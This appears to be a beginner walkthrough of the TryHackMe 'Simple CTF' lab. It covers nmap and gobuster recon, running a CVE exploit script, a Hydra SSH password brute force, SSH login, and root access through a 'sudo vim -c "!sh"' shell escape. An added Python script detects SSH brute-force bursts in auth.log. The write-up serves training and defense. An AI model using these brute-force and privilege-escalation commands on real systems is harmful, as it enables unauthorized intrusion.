Walkthrough: Simple CTF - TryHackMe.
Beginner-level CTF.
As usual, the first step is to run nmap to find open ports.
┌──(kali㉿kali)-[~/Documents]
└─$nmap -sV machine-ip
Results:
Port    Service    Notes
21      FTP        Anonymous login allowed
80      HTTP       robots.txt
2222    SSH        Non-standard SSH port
This will solve the first two questions.
Then we are asked for the CVE to use against the application.
I ran GoBuster to find out the directories of our target.
┌──(kali㉿kali)-[~/Documents]
└─$gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt
Results:
- /index
- /simple <-- this one has a vulnerability
The /simple dir has a CVE. I did a bit of googling to find the CVE number, the type of attack and an exploit.
Using the exploit, I found the username.
Exploit:
┌──(kali㉿kali)-[~/Documents]
└─$python3 exploit.py -u http://machine-ip/simple -w list.txt -c
I struggled a bit to run the exploit, got a couple of errors, but I ended up getting the username.
However, the password took ages and I couldn't get it. Instead I used Hydra:
┌──(kali㉿kali)-[~/Documents]
└─$hydra -l mitch -P rockyou.txt ssh://machine-ip:2222
password found: secret
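As an added defender-side example that is not part of the original walkthrough, the script below scans sshd auth.log lines for the trace a Hydra run like the one above leaves behind: a burst of failed logins from one source, then a success. The log lines, IP addresses and thresholds are all constructed for the example, not taken from the machine.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth.log lines (not from the original walkthrough); the
# message format is the standard OpenSSH sshd "Failed/Accepted password" line.
SAMPLE_LOG = """\
Mar  3 10:15:01 target sshd[1201]: Failed password for mitch from 10.10.14.7 port 40210 ssh2
Mar  3 10:15:01 target sshd[1203]: Failed password for mitch from 10.10.14.7 port 40212 ssh2
Mar  3 10:15:02 target sshd[1205]: Failed password for mitch from 10.10.14.7 port 40214 ssh2
Mar  3 10:15:02 target sshd[1207]: Failed password for mitch from 10.10.14.7 port 40216 ssh2
Mar  3 10:15:03 target sshd[1209]: Failed password for invalid user admin from 10.10.14.7 port 40218 ssh2
Mar  3 10:15:03 target sshd[1211]: Accepted password for mitch from 10.10.14.7 port 40220 ssh2
Mar  3 10:20:44 target sshd[1300]: Failed password for bob from 192.168.1.20 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts for source IPs with >= threshold failed logins inside the
    sliding window, and for a successful login that follows such a burst."""
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    alerted = set()              # ips already reported as bursting
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an authentication result line
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year
        ip, user, result = m["ip"], m["user"], m["result"]
        q = recent[ip]
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append({"ip": ip, "type": "bruteforce", "failures": len(q)})
        elif len(q) >= threshold:
            # A success right after a burst is the highest-priority signal: a
            # guessed password rather than a user's typo.
            alerts.append({"ip": ip, "type": "success_after_burst", "user": user})
    return alerts
```

On a real host, feed it `/var/log/auth.log` (or `journalctl -u ssh`) and tune the threshold to the environment; fail2ban implements the same idea as a blocking control.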
With this information we can log in using ssh.
┌──(kali㉿kali)-[~/Documents]
└─$ssh mitch@machine-ip -p 2222
There we find a .txt with the first flag.
Using cd we found there's another user's folder.
To get the root flag we need to check what this user is allowed to run as sudo, using 'sudo -l'.
Vim can be run as sudo and without a password.
┌──(kali㉿kali)-[~/Documents]
└─$sudo vim -c "!sh"
This gives us root privileges.
We go to the root folder to find the final flag.